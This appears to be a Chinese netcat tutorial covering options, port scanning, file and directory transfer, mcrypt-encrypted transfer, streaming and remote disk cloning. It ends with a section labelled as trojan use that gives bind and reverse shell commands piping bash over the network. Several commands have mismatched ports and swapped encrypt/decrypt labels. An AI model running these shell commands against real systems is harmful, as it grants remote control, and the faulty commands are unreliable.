文章目录
nc 安***r> yum install -y nc
参数:
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin #无图形界面使用后台模式
-h This help text #获取帮助信息
-i secs Delay interval for lines sent, ports scanned #延时设置,端口扫描时使用
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects #监听入站信息
-n Suppress name/port resolutions #后跟ip地址
-p port Specify local port for remote connects
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address #发送数据源地址
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation #以TELNET的形式应答入站请求
-U Use UNIX domain socket
-u UDP mode #使用UDP协议
-v Verbose #显示详细的输出内容
-w secs Timeout for connects and final net reads #超时秒数
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning] # I/O 模式,扫描时使用
nc作为客户端:
nc -nvz 10.104.11.107 1-65535 默认探测TCP端口
nc -nvzu 10.104.11.107 1-65535 #探测UDP端口
作用:
传输文本信息
nc -l 9999 #客户端开启一个端口
netstat -pantu |grep 9999 #查看33端口是否打开
nc -l 9999 >ps.txt 监听到的信息输出到pa.txt
进行连接:
1 nc -nvv 10.104.11.128 9999
2 ls -l |nc -nv 10.104.11.128 9999 输出信息打印到10.104.11.128主机
传输文件
1 A: nc -l 999>1.html
2 B: nc -nv 10.104.11.128 9999<1.html
或者
1 A:nc -l 9999<ps.txt
2 B: nc -nv 10.104.11.128 9999 >ps.txt
传输目录(先打包)
1 A:tar -cvf - music/|nc -l 9999
2 B:nc -nv 10.104.11.128 9999|tar -xvf -
加密传输文件(先加密在传送再解密)
1 A:nc -l 333|mcrypt --flush -Fbqd(加密) -a rijndael-256 -m ecb >1.mp3
2 B:mcrypt --flush -Fbq(解密) -a rijndael-256 -m ecb <1.mp3 |nc -nv 10.104.11.128 9999
#对称加密两边密码要相同
流媒体服务
1 A: cat 1.mp3|nc -l 9999
2 B: nc -nv 10.104.11.107|mplayer -vo xll -cache 3000- #指定媒体播放器进行播放
端口扫描
1 nc -nvz 10.104.11.128
远程克隆硬盘
1 A:nc -l 9999|dd of =/dev/sda
2 B:dd if=/dev/sda |nc -nv 10.104.11.128 9999
远程控制/木马
1 正向:
2 A:nc -l 9999 -c bash
3 B:nc 10.104.11.128
4 反向:
5 A:nc -l 9999
6 B:nc 10.104.11.128 9999 -c bash
注:Windows用户把bash改成cmd
缺点:缺乏加密与身份认证
京公网安备 11010502036488号